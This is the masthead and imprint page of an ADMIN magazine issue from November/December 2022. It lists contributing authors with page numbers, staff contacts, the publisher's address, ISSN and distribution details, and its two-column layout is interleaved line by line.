Dena Friesen, Illustration based on graphics by
Ken Hess 3 stated in writing.
Jakarin Niamklang, 123RF.com
All brand or product names are trademarks
Christian Knermann 40 Advertising
Brian Osborn, bosborn@linuxnewmedia.com of their respective owners. Contact us if we
Petros Koutoupis 84 phone +49 8093 7679420 haven’t credited your copyright; we will always
correct any oversight.
Felix Kronlage-Dammers 20 Publisher
Brian Osborn Printed in Nuremberg, Germany by Zeitfracht GmbH.
Martin Kuppinger 76 Marketing Communications Distributed by Seymour Distribution Ltd, United
Jeff Layton 88 Gwen Clark, gclark@linuxnewmedia.com Kingdom
Linux New Media USA, LLC ADMIN is published bimonthly by Linux New Media
Martin Gerhard Loschwitz 14, 24, 50 4840 Bob Billings Parkway, Ste 104 USA, LLC, 4840 Bob Billings Parkway, Ste 104,
Lawrence, KS 66049 USA Lawrence, KS 66049, USA (Print ISSN: 2045-0702,
Federico Lucifredi 93
Customer Service / Subscription Online ISSN: 2831-9583). November/December 2022.
Ali Imran Nagori 46 For USA and Canada: Periodicals Postage paid at Lawrence, KS. Ride-
Akshat Pradhan 58 Email: cs@linuxnewmedia.com Along Enclosed. POSTMASTER: Please send
Phone: 1-866-247-2802 address changes to ADMIN, 4840 Bob Billings
Dr. Holger Reibold 36 (Toll Free from the US and Canada) Parkway, Ste 104, Lawrence, KS 66049, USA.
Andreas Stolzenberger 30, 70 For all other countries: Represented in Europe and other territories by:
Email: subs@linuxnewmedia.com Sparkhaus Media GmbH, Bialasstr. 1a, 85625
Matthias Wübbeling 56, 62 www.admin-magazine.com Glonn, Germany.

98 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M

You might also like